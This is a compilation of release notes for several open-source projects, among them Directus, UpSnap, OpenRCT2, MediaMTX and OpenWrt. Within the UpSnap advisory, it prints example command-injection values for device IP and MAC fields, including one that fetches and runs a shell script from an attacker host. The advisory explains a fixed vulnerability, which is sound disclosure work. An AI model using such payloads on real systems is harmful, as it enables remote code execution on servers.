  • Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437 by @formfcw)

  • Updated sidebar styles @formfcw (#27437 by @formfcw)

  • Refactored drawer header layout and simplified v-drawer API @formfcw (#27437 by @formfcw)

    :::notice

    • Deprecation for extensions: The globally registered v-breadcrumb component has been deprecated. Extensions using <v-breadcrumb> keep rendering but will see a deprecation hint from Volar.
    • Deprecation for extensions: On v-drawer, the subtitle prop (use the title prop instead), the subtitle slot, the header:append slot, and the actions:append slot have been deprecated. Existing usage keeps rendering — actions:append content lands in the secondary-actions zone, and for primary CTAs in the drawer header use the new actions:primary slot. Consumers will see deprecation hints from Volar.
    • Potential Breaking change for theme extensions: The theme properties header.headline.foreground and header.headline.fontFamily have been removed. Custom themes overriding these properties should remove them. The corresponding CSS variables --theme--header--headline--foreground and --theme--header--headline--font-family no longer exist.

    :::

• @directus/extensions
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/extensions-registry
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/extensions-sdk
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/format-title
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/memory
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/pressure
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/release-notes-generator
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/update-check
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/validation
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/schema
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/schema-builder
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/specs
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/storage
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/storage-driver-cloudinary
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/storage-driver-supabase
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/storage-driver-azure
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/storage-driver-gcs
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/storage-driver-local
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/storage-driver-s3
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/stores
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• create-directus-extension
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• create-directus-project
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/env
  • Changed the default of IP_TRUST_PROXY from true to false to harden the default deployment against IP spoofing. (#27607 by @br41nslug)
• @directus/sdk

  • Refactor sdk error to use class over object (#27417 by @ComfortablyCoding)

    :::warning
    Requests that fail will now throw a RequestError instead of returning a response with an error property.
    :::

✨ New Features & Improvements

• @directus/app

  • Introduced VERSION_KEY_* constants and renamed main to published @alvarosabu (#27397 by @formfcw)

  • Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)

  • Fixed Image Editor save button to use split button @HZooly (#27437 by @formfcw)

  • Added split-menu slot to v-button and migrate primary header actions @formfcw (#27437 by @formfcw)

  • Added AI-powered translations to the translations interface, including glossary, style guide, and configurable default model settings derived from the enabled providers and allowed models. (#26940 by @bryantgillespie)

  • Added version support to getItemRoute and update all callers to preserve version context when navigating to items from layouts and interfaces @alvarosabu (#27397 by @formfcw)

  • Added behavior to auto-switch to the draft version on the first edit of published item @alvarosabu (#27507 by @alvarosabu)

  • Added Publish without Review action to the publish split menu with shortcut @alvarosabu (#27501 by @alvarosabu)

  • Updated Visual Editor header bar buttons @formfcw (#27437 by @formfcw)

  • Updated content route middleware to handle singleton collections and draft flow via route guards @alvarosabu (#27397 by @formfcw)

  • Replaced status field with archived boolean in collection settings @alvarosabu (#27397 by @formfcw)

  • Updated module bar buttons style @HZooly (#27437 by @formfcw)

  • Deprecated the VResizeable component @formfcw (#27437 by @formfcw)

  • Updated VChip component to appear as a pill in form field label, group accordion, group tabs, kanban, deployment status, extension item, marketplace extension list item, marketplace extension banner, and user popover @formfcw (#27462 by @formfcw)

  • Updated type system, borders, and theme variables @formfcw (#27437 by @formfcw)

  • Rendered non-clickable version menu without directus_versions read access @alvarosabu (#27461 by @alvarosabu)

  • Added item-less draft creation flow for versioned collections @alvarosabu (#27397 by @formfcw)

  • Updated module navigation bar spacing and styling @HZooly (#27437 by @formfcw)

  • Updated Visual Editor popover/modal action buttons @formfcw (#27437 by @formfcw)

  • Updated UI for the Draft & Publish workflow @formfcw (#27437 by @formfcw)

  • Updated mobile appearance of drawer sidebar @formfcw (#27437 by @formfcw)

  • Moved Promote/Publish button to header actions @alvarosabu (#27397 by @formfcw)

  • Updated primary header actions to show label and replace outlined header action buttons @formfcw (#27437 by @formfcw)

  • Updated SearchInput component to match the new design @formfcw (#27437 by @formfcw)

  • Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)

  • Refactored header bar action slots and reorganized CTAs @formfcw (#27437 by @formfcw)

    :::notice

    • Deprecation for extensions: The actions:append slot in the header bar has been deprecated in favor of the new actions:primary slot for primary CTAs. Existing actions:append usage keeps rendering in the secondary-actions zone, but consumers will now see a deprecation hint from Volar.

    :::

  • Added navigation logic on discarding item-less versions @alvarosabu (#27397 by @formfcw)

  • Put the sidebar into the content area @HZooly (#27437 by @formfcw)

  • Updated color system for VChip and VersionMenu components @formfcw (#27437 by @formfcw)

  • Updated content section spacing and drawer content spacing @HZooly (#27437 by @formfcw)

  • Extracted the card subheader into a reusable subheader component @HZooly (#27437 by @formfcw)

  • Added version select to collection page @alvarosabu (#27397 by @formfcw)

  • Updated sidebar styles @formfcw (#27437 by @formfcw)

  • Renamed "Promote" to "Publish" in version menu and disabled create version and published selection for item-less versions @alvarosabu (#27397 by @formfcw)

  • Added version query param guards on content-item route @alvarosabu (#27397 by @formfcw)

  • Improved bookmark flow @formfcw (#27450 by @formfcw)

  • Forwarded theme tokens and i18n strings from Studio to the visual-editing iframe @formfcw (#27469 by @formfcw)

  • Refactored focus ring from border/box-shadow to outline @formfcw (#27437 by @formfcw)

  • Introduced VersionChip component @formfcw (#27437 by @formfcw)

  • Updated theme preview component to match the new design @formfcw (#27437 by @formfcw)

  • Updated collab avatar indicator design @formfcw (#27437 by @formfcw)

  • Refactored drawer header layout and simplified v-drawer API @formfcw (#27437 by @formfcw)

    :::notice

    • Deprecation for extensions: The globally registered v-breadcrumb component has been deprecated. Extensions using <v-breadcrumb> keep rendering but will see a deprecation hint from Volar.
    • Deprecation for extensions: On v-drawer, the subtitle prop (use the title prop instead), the subtitle slot, the header:append slot, and the actions:append slot have been deprecated. Existing usage keeps rendering — actions:append content lands in the secondary-actions zone, and for primary CTAs in the drawer header use the new actions:primary slot. Consumers will see deprecation hints from Volar.
    • Potential Breaking change for theme extensions: The theme properties header.headline.foreground and header.headline.fontFamily have been removed. Custom themes overriding these properties should remove them. The corresponding CSS variables --theme--header--headline--foreground and --theme--header--headline--font-family no longer exist.

    :::

  • Updated header bar elements and deprecated the headline slot @formfcw (#27437 by @formfcw)

  • Ensured to switch to the draft version when visually editing an item of a versioned collection @formfcw (#27595 by @formfcw)

  • Extracted reusable ModuleBarButton component @formfcw (#27437 by @formfcw)

  • Moved client-validation to promote version workflow instead of save version @alvarosabu (#27397 by @formfcw)

  • Added Create New action to publish split menu with shortcut @alvarosabu (#27425 by @alvarosabu)

• @directus/api
  • Introduced VERSION_KEY_* constants and renamed main to published @alvarosabu (#27397 by @formfcw)
  • Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)
  • Added AI-powered translations to the translations interface, including glossary, style guide, and configurable default model settings derived from the enabled providers and allowed models. (#26940 by @bryantgillespie)
  • Added Publish without Review action to the publish split menu with shortcut @alvarosabu (#27501 by @alvarosabu)
  • Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
  • Added JSON filtering, alias and sorting support (#26981 by @br41nslug)
  • Added support for item-less versions @Nitwel (#27397 by @formfcw)
  • Added support for the version query parameter in collections @Nitwel (#27397 by @formfcw)
• @directus/constants
  • Introduced VERSION_KEY_* constants and renamed main to published @alvarosabu (#27397 by @formfcw)
• @directus/env
  • Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)
  • Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
• @directus/system-data
  • Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)
  • Replaced status field with archived boolean in collection settings @alvarosabu (#27397 by @formfcw)
  • Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
• @directus/types
  • Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)
  • Updated type system, borders, and theme variables @formfcw (#27437 by @formfcw)
  • Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
  • Refactored focus ring from border/box-shadow to outline @formfcw (#27437 by @formfcw)
  • Added support for item-less versions @Nitwel (#27397 by @formfcw)
  • Added support for the version query parameter in collections @Nitwel (#27397 by @formfcw)
• @directus/errors
  • Added Publish without Review action to the publish split menu with shortcut @alvarosabu (#27501 by @alvarosabu)
• @directus/composables
  • Updated type system, borders, and theme variables @formfcw (#27437 by @formfcw)
  • Added version select to collection page @alvarosabu (#27397 by @formfcw)
• @directus/themes
  • Updated type system, borders, and theme variables @formfcw (#27437 by @formfcw)
  • Refactored focus ring from border/box-shadow to outline @formfcw (#27437 by @formfcw)
  • Updated header bar elements and deprecated the headline slot @formfcw (#27437 by @formfcw)
• @directus/utils
  • Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
• @directus/sdk
  • Added JSON filtering, alias and sorting support (#26981 by @br41nslug)
  • Added support for item-less versions @Nitwel (#27397 by @formfcw)
• @directus/specs
  • Added support for the version query parameter in collections @Nitwel (#27397 by @formfcw)
• @directus/visual-editing
  • Redesigned the editable-element overlay with theming, RTL support and improved a11y @formfcw (#27469 by @formfcw)

🐛 Bug Fixes & Optimizations

• @directus/app
  • Added DIRECTUS_DOMAIN constant and replaced hardcoded directus.io to directus.com using the new constant (#27417 by @ComfortablyCoding)
  • Limited mobile sidebar width so the overlay can be tapped to close it @HZooly (#27437 by @formfcw)
  • Bumped vue-tsc to 3.1.8 (#27437 by @formfcw)
  • Fixed icon alignment in v-divider component @HZooly (#27437 by @formfcw)
  • Fixed v-dialog returning focus to opener instead of an autofocused child on close @formfcw (#27464 by @formfcw)
  • Fixed flow handle button alignment in flow editor @HZooly (#27437 by @formfcw)
  • Shown "Import in background" checkbox only when a file is selected @HZooly (#27437 by @formfcw)
  • Fixed sidebar reopening at minimum size after being collapsed via drag handle @HZooly (#27437 by @formfcw)
  • Fixed vue console warnings related to the comparison modal (#27538 by @formfcw)
  • Fixed misaligned filter editor in search bar @formfcw (#27454 by @formfcw)
  • Changed back button behavior, always navigates one level up @HZooly (#27437 by @formfcw)
  • Fixed repeater interface ignoring per-field translations and $t: keys on sub-field labels, and added a "Field Name Translations" section to the sub-field configuration UI (#27374 by @khanahmad4527)
  • Fixed calendar layout toolbar responsiveness @HZooly (#27437 by @formfcw)
  • Fixed items not being selectable in the collection drawer when the Kanban layout is used while the parent item is opened in a version context @alvarosabu (#27427 by @alvarosabu)
  • Fixed bookmark icon and color not showing in header @formfcw (#27437 by @formfcw)
  • Fixed UI freeze caused by WYSIWYG interface when its non-editable state toggles @formfcw (#27515 by @formfcw)
• @directus/api
  • Fixed registration email verification tokens to use the configured secret fallback when SECRET is missing. (#27406 by @rijkvanzanten)
  • Bumped axios, js-cookie, samlify, systeminformation, simple-git, fast-uri dependencies (#27589 by @br41nslug)
  • Fixed MCP OAuth dynamic client registration defaults and metadata responses. (#27628 by @hanneskuettner)
  • Updated IP blocking (#27606 by @br41nslug)
  • Updated the built-in OpenAI and Anthropic AI model lists to use the latest available API models. (#27602 by @hanneskuettner)
• @directus/constants
  • Added DIRECTUS_DOMAIN constant and replaced hardcoded directus.io to directus.com using the new constant (#27417 by @ComfortablyCoding)
• @directus/system-data
  • Added AI-powered translations to the translations interface, including glossary, style guide, and configurable default model settings derived from the enabled providers and allowed models. (#26940 by @bryantgillespie)
  • Updated the built-in OpenAI and Anthropic AI model lists to use the latest available API models. (#27602 by @hanneskuettner)
• @directus/types
  • Added AI-powered translations to the translations interface, including glossary, style guide, and configurable default model settings derived from the enabled providers and allowed models. (#26940 by @bryantgillespie)
  • Added JSON filtering, alias and sorting support (#26981 by @br41nslug)
• @directus/utils
  • Added JSON filtering, alias and sorting support (#26981 by @br41nslug)
• @directus/ai
  • Updated the built-in OpenAI and Anthropic AI model lists to use the latest available API models. (#27602 by @hanneskuettner)
• @directus/release-notes-generator
  • Ignored private workspace packages when generating release notes (#27637 by @licitdev)

📦 Published Versions

• @directus/app@16.0.0-rc.0
• @directus/api@36.0.0-rc.0
• @directus/ai@1.3.2-rc.0
• @directus/composables@11.5.0-rc.0
• @directus/constants@14.4.0-rc.0
• create-directus-extension@12.0.0-rc.0
• create-directus-project@13.0.0-rc.0
• @directus/env@6.0.0-rc.0
• @directus/errors@2.4.0-rc.0
• @directus/extensions@4.0.0-rc.0
• @directus/extensions-registry@4.0.0-rc.0
• @directus/extensions-sdk@18.0.0-rc.0
• @directus/format-title@13.0.0-rc.0
• @directus/memory@4.0.0-rc.0
• @directus/pressure@4.0.0-rc.0
• @directus/release-notes-generator@3.0.0-rc.0
• @directus/schema@14.0.0-rc.0
• @directus/schema-builder@1.0.0-rc.0
• @directus/specs@14.0.0-rc.0
• @directus/storage@13.0.0-rc.0
• @directus/storage-driver-azure@13.0.0-rc.0
• @directus/storage-driver-cloudinary@13.0.0-rc.0
• @directus/storage-driver-gcs@13.0.0-rc.0
• @directus/storage-driver-local@13.0.0-rc.0
• @directus/storage-driver-s3@13.0.0-rc.0
• @directus/storage-driver-supabase@4.0.0-rc.0
• @directus/stores@3.0.0-rc.0
• @directus/system-data@4.5.0-rc.0
• @directus/themes@2.0.0-rc.0
• @directus/types@16.0.0-rc.0
• @directus/update-check@14.0.0-rc.0
• @directus/utils@13.5.0-rc.0
• @directus/validation@3.0.0-rc.0
• @directus/visual-editing@2.1.0-rc.0
• @directus/sdk@22.0.0-rc.0

Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.05.29

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.05.29

Changes

• fix pnpm upgrade to the correct package age limit (baa72c0)
• review fixes (cf2d2dd)
• fix catch (56c0ad3)
• upgrade dependencies (4478d13)
• fix(ui): drop redundant tooltip on share button (ad92607)
• feat(ui): warn before share + surface failures for large files (6ff364a)
• feat(ui): add iOS Web Share button next to download link (39a8948)
• remove circle and make labels with help text have an underline (f034858)
• make ui more mobile mobile-friendly (e2773db)

[0.16.7] - 2026-05-28

If you are upgrading from v0.16.x, replace the binary (or run docker pull). If you are upgrading from v0.15.x and below, please read the upgrading documentation for more information on how to upgrade from previous versions.

Added

• RateLimit header fields for HTTP (draft-ietf-httpapi-ratelimit-headers-10)
• MTA: Implement spamtest in trusted Sieve scripts.

Changed

Fixed

• Log rejected messages to tracing store.
• MTA:
  • Always update next DSN notify times.
  • Expand lists and resolve catch-all addresses when building autogenerated messages.
• Sharing: Includes resource that themselves carry a direct ACL grant and are leaves.
• Tasks cannot be deleted in OSS builds.
• Directory: Per-domain external directory resolution fails.
• DNS updater: Keep external TXT records when updating RRSet.
• HTTP: Reject requests from blocked IPs when Keep-Alive is enabled.

Check binary attestation here

Releases Notes for 30.0.4

Windows Installer
Windows No Installer (zip)
macOS - Universal
Linux - deb, AppImage or rpm

Windows intel x32 releases are marked -ia32-

ChangeLog:

• Uses electron 42.3.0
• Updates to draw.io core 30.0.4.

New Setup Process

GHSA-w4jr-728f-5jhq

What changed

The initial setup process has been changed. Instead of a built-in multi-step wizard, UpSnap now directs you to create your first superuser account via the server console logs, which contain a one-time setup link generated by PocketBase.

Once you've created the superuser using that link, return to the UpSnap welcome page and click Done to continue.

Why this was necessary

In versions prior to 5.4.0, the setup wizard allowed anyone with network access to register the first superuser account if they reached the setup page before the legitimate administrator. This meant that on a publicly reachable instance, an attacker could take ownership of the application before the real admin had a chance to complete the setup.

By moving account creation out-of-band to the server console, only someone with access to the server logs (i.e. the administrator) can complete the initial setup.

RCE via Device IP and MAC Address Injection

GHSA-6mc7-6948-w5h4

What was the issue

UpSnap allows setting custom shell commands for waking and shutting down devices. These commands support {{ DEVICE_IP }} and {{ DEVICE_MAC }} placeholders, which are replaced with the device's actual IP and MAC values before being executed on the server.

In versions prior to 5.4.0, these values were only changed by removing spaces before being substituted into the shell command. An attacker with permission to edit a device could set a malicious IP or MAC field, for example:

IP: 127.0.0.1;curl${IFS}http://attacker.com/shell.sh|sh
MAC: 00:00:00:00:00:00&&id

When the device was woken or shut down, the injected commands would execute on the server with the same privileges as UpSnap itself.

What was fixed

1. Backend: Before substituting {{ DEVICE_IP }} and {{ DEVICE_MAC }} into any shell command, UpSnap additionally validates both values using Go's standard net.ParseIP and net.ParseMAC. If a value somehow reaches this point in an invalid state, the command is rejected and an error is returned instead of executing.

2. Database: A new migration adds regex constraints to the ip and mac fields in the PocketBase schema (^((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4}$ for IP, ^([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})$ for MAC). Any write that bypasses the UI is rejected at the database level.

3. HTML input: The IP and MAC fields in the device form now have pattern attributes that enforce valid formats directly in the browser, preventing malformed values from being submitted in the first place.

Who is affected

Any instance where untrusted users had permission to create or edit devices. Users who are the sole administrator of their own instance and have not shared device-edit access are at lower risk.

Changelog

Bug fixes

• 74633e7: fix: use token based superuser setup (@seriousm4x)
• 43f3f65: fix: validate ip and mac addresses to prevent RCE (@seriousm4x)

Others

• dfaf0ee: build(deps-dev): bump @sveltejs/kit from 2.59.1 to 2.60.1 in /frontend (@dependabot[bot])
• 8b08585: build(deps-dev): bump svelte from 5.55.5 to 5.55.7 in /frontend (@dependabot[bot])
• 92f9e29: update deps (@seriousm4x)

[0.16.6] - 2026-05-20

If you are upgrading from v0.16.x, replace the binary (or run docker pull). If you are upgrading from v0.15.x and below, please read the upgrading documentation for more information on how to upgrade from previous versions.

Added

• Added 58 new DNS provider integrations (see dns-update crate for details).
• DNS updater: Log DNS record types and values.
• Sieve: Allow User Sieve scripts to access orcpt.
• MTA: Log when messages are rejected or discarded by the spam classifier.

Changed

• Bump JMAP File Storage to draft-ietf-jmap-filenode-14.
• Accept password hashes with $ or { prefixes as secure secrets.

Fixed

• DAV: acl-principal-prop-set REPORT enforced the wrong privilege.
• JMAP: Thread/get did not filter by per-mailbox ACLs on shared accounts.
• IMAP: UID FETCH N:* could miss messages moved into a SELECTed mailbox by another connection.
• DNS updater:
  • Skip v=spf1 a -all records for apex domains.
  • RFC2136 TSIG: regression related to multiplexer.
  • Route53: Chunk TXT records when they exceed 255 characters.
• ACME:
  • Update defaultCertificateId when renewing a certificate that is currently set as default.
  • Perform DNS-01 authorizations sequentially to avoid race conditions in some DNS providers.
• Allow internal TLDs and special characters in e-mail addresses.
• Websocket: Perform case insensitive matching during upgrade.
• LDAP: Synchronize accounts when expanding mailing list recipients.
• Sieve: replace action adds an extra From header.
• ACL: Orphaned ACL entries for deleted accounts cause JMAP session errors.

Check binary attestation here

0.5.1 (2026-05-17)

• Feature: [#24242] [Plugin] Add ride-breakdown hooktype.
• Feature: [#24879] [Plugin] Add methods for showing and hiding gridlines.
• Feature: [#26327] Add ‘guests entertained’ statistic to entertainers.
• Improved: [#26374] Add higher resolution app icons for Android.
• Improved: [#26386] Initial window scale and toolbar options on fresh Android installations.
• Change: [#26476] Limit creation of new station styles to prepare for more flexibility with ride stations and entrances.
• Fix: [#25581] Chart drawing issue on some platforms due to compiler optimisation.
• Fix: [#26019] Inverted and Inverted Flying Roller Coaster large half loops glitch with the train and don‘t draw in tunnels at some angles (original bug).
• Fix: [#26183] The ride stat graph placeholder text is not drawn in the expected position.
• Fix: [#26287] Game crashes upon connect/disconnect of physical keyboard.
• Fix: [#26299] Single Rail S-Bend sprites don’t fully connect to the next track piece at certain angles.
• Fix: [#26352] Large scenery items are incorrectly labelled as ‘banners’ in the tile inspector.
• Fix: [#26352] The label for path additions is using the wrong text colour in the tile inspector.
• Fix: [#26360] Inverted Lay-down Roller Coaster helices are invisible when loading old saves.
• Fix: [#26396] [Plugin] Socket interfaces were not closing properly and firing up correctly in parallel.
• Fix: [#26410] Tiles with water can draw incorrectly when there is something underwater and nothing above water.
• Fix: [#26418] Game crashes when a stack overflow occurs in plugin code.
• Fix: [#26419] Drop count & negative g’s stat requirements for Flying Roller Coaster don’t get nullified by having an inversion.
• Fix: [#26421] Wrong scenery tab highlighted when more than 64 scenery groups are selected.
• Fix: [#26425] Benches don’t reduce watching spots from 4 to 2 while other path additions do (should be reversed).
• Fix: [#26432] Guests choose to head for rides they have already ridden if they don’t have a map.
• Fix: [#26492] Drag tool shows per-tile error instead of total cost when running out of money midway through placement.
• Fix: [#26510] Displayed air time overflows after 655.35 seconds instead of the internal maximum of 1966.05 seconds.

Release created in https://github.com/OpenRCT2/OpenRCT2/actions/runs/25987971355

SHA256 checksums:

61cd955dc5820787de844f7b523d56ff5329a908961c4fc48ce4a84584730fb7  ./OpenRCT2-v0.5.1-windows-installer-arm64.exe
4614029327c61247000d1a6a7a249b1e5fe93dfc841ad164e2905196b72aa098  ./OpenRCT2-v0.5.1-windows-portable-x64.zip
5681e8a7d6cf409381c35e6035a91638e39027757f77c5437957b3a9ab478444  ./OpenRCT2-v0.5.1-windows-symbols-arm64.zip
11a7accb196d9dd71e4b76ac50965841f9a0f1ad89866cd2b07a62c9e0ee218e  ./OpenRCT2-v0.5.1-sha256sums.txt
16232c44ca0890b07679a7e37ad0e683e17826f61868ad6363f2fc192fd6f2fa  ./OpenRCT2-v0.5.1-windows-symbols-win32.zip
287a8fa5944b71d41c5a0e77750a6f734eaeb27d9686420d585088d176e3c0b7  ./OpenRCT2-v0.5.1-android.apk
bebe142a2f0148d82c2a941f8d06fd5c12540c59479b8f26d170944ebce44475  ./OpenRCT2-v0.5.1-Linux-resolute-x86_64.tar.gz
91729c3804e165ab1dd1ca0875554970fc013aa8368fe2e41e3894f718eb83ca  ./OpenRCT2-v0.5.1-windows-portable-arm64.zip
dfecc57d87b18ffb78780cac233bebe2eaa8ff1de7e915bfcdfe00e08dd02f2f  ./OpenRCT2-v0.5.1-macos-universal.zip
a4e6450ec12db77fb4663afa1a393bb0d03a46e9c47b1d4b29a603cc8145b512  ./OpenRCT2-v0.5.1-linux-x86_64.AppImage
fdd1846a2f21062f5716204b8de9626892b87c95c6ebbb2f7385e49a150092d0  ./OpenRCT2-v0.5.1-windows-installer-win32.exe
8d0e1dc4fa2ed5ecc76fcaafdec8a198048a953cce90314590961dda53a04da2  ./OpenRCT2-v0.5.1-windows-symbols-x64.zip
6ba42ab9ffcd21ea10eb27880e6ed51bad1663e7e235203db2c4fc4bf73200c5  ./OpenRCT2-v0.5.1-windows-installer-x64.exe
226840077ff14851bc817ddb80bc8b0cf432f141481516e66bf5e05339143195  ./OpenRCT2-v0.5.1-Linux-trixie-x86_64.tar.gz
0976a7d610fa94f6a298133d0293d60f007d92d0cd7f2c971776636a27e2ac3c  ./OpenRCT2-v0.5.1-windows-portable-win32.zip
a53e5a6ec08f792bcc488a04d465d4eb27bf87e25311e644700b14ea79be33d1  ./OpenRCT2-v0.5.1-Linux-noble-x86_64.tar.gz
05ed8d31e04c1f9cd17d5998442d12e4050a56b7f8225f3e5b66478408bad2cd  ./OpenRCT2-v0.5.1-Linux-bookworm-x86_64.tar.gz

Releases Notes for 30.0.2

Windows Installer
Windows No Installer (zip)
macOS - Universal
Linux - deb, AppImage or rpm

Windows intel x32 releases are marked -ia32-

ChangeLog:

• Uses electron 42.1.0
• Updates to draw.io core 30.0.2.

Fixes and improvements

RTSP

• fix compatibility with Verint.Vms.MediaGateway (#5292) (bluenviron/gortsplib#1061)
• fix crash when stream is closing (bluenviron/gortsplib#1062) when ServerStream.Close() is called, stream readers might have their setuppedTransport set to nil, causing the server to crash. Prevent this.
• fix race condition when tearing down connection (bluenviron/gortsplib#1063) ServerConn.session was not properly protected.
• fix leak in case of failure during multicast initialization (bluenviron/gortsplib#1064)

RTMP

• prevent nil / unconfigured tracks from appearing (bluenviron/gortmplib#66) (#5724) (#5729)

HLS

• fix error 500 caused by in-stream params (bluenviron/gohlslib#355) (#5728) (#5745) PR bluenviron/gohlslib#344 caused a regression. Many codecs (AV1, H264, H265, VP9) use in-stream parameters, that were not taken into consideration anymore when generating init.mp4 and playlists. This has been solved.

WebRTC

• fix checking POST responses (#5758)
• support interacting with servers with no trickle ICE (#5273) (#5757)
• support WHIP ICE restarts (https://github.com/bluenviron/mediamtx/issues/5183) (#5770)

RPI Camera

• support changing text overlay dynamically (#5270) (#5748)

Dependencies

• code.cloudfoundry.org/bytefmt updated from v0.70.0 to v0.72.0
• github.com/Masterminds/semver/v3 updated from v3.4.0 to v3.5.0
• github.com/bluenviron/gohlslib/v2 updated from v2.3.1 to v2.3.2
• github.com/bluenviron/gortmplib updated from v0.3.1 to v0.3.2
• github.com/bluenviron/gortsplib/v5 updated from v5.5.2 to v5.5.3
• github.com/datarhei/gosrt updated from v0.10.0 to v0.11.0
• github.com/fsnotify/fsnotify updated from v1.10.0 to v1.10.1
• github.com/go-git/go-billy/v5 updated from v5.8.0 to v5.9.0
• github.com/go-git/go-git/v5 updated from v5.18.0 to v5.19.0
• github.com/gookit/color updated from v1.6.0 to v1.6.1
• github.com/matthewhartstonge/argon2 updated from v1.5.2 to v1.5.3
• github.com/pion/rtp updated from v1.10.1 to v1.10.2
• golang.org/x/crypto updated from v0.50.0 to v0.51.0
• golang.org/x/net updated from v0.53.0 to v0.54.0
• golang.org/x/sys updated from v0.43.0 to v0.44.0
• golang.org/x/term updated from v0.42.0 to v0.43.0
• github.com/cyphar/filepath-securejoin updated from v0.4.1 to v0.6.1
• github.com/pjbgf/sha1cd updated from v0.3.2 to v0.6.0
• golang.org/x/text updated from v0.36.0 to v0.37.0
• github.com/bluenviron/mediamtx-rpicamera updated from v2.5.6 to v2.5.7

Security

Binaries are compiled from source code by the Release workflow, which is a fully-visible process that prevents any change or external interference in produced artifacts.

Checksums of binaries are also published in a public blockchain by using GitHub Attestations, and they can be verified by running:

ls mediamtx_* | xargs -L1 gh attestation verify --repo bluenviron/mediamtx

You can verify checksums of binaries by downloading checksums.sha256 and running:

cat checksums.sha256 | grep "$(ls mediamtx_*)" | sha256sum --check

Changelog

Bug fixes

• 7b8bcfa: fix: switch cron-parser to named import (CronExpressionParser) (#1737) (@codeanish)

Hi,

The OpenWrt community is proud to announce the fourth service release of the OpenWrt 25.12 stable series.

Download firmware images using the OpenWrt Firmware Selector:

• https://firmware-selector.openwrt.org/?version=25.12.4

Download firmware images directly from our download servers:

• https://downloads.openwrt.org/releases/25.12.4/targets/

Main changes between OpenWrt 25.12.3 and OpenWrt 25.12.4

Only the main changes are listed below. See the full changelog for details.

Security fixes

• dnsmasq: backport six upstream CVE-fix patches to dnsmasq 2.91:
  • CVE-2026-2291: heap buffer overflow in DNS domain-name handling.
  • CVE-2026-4890 / CVE-2026-4891: DNSSEC crashes via crafted NSEC bitmaps / RRSIG packets.
  • CVE-2026-4892: buffer overflow on large DHCPv6 CLIDs (only with --dhcp-script).
  • CVE-2026-4893: broken EDNS Client Subnet validation.
  • CVE-2026-5172: buffer overflow in extract_addresses() on crafted resource records.
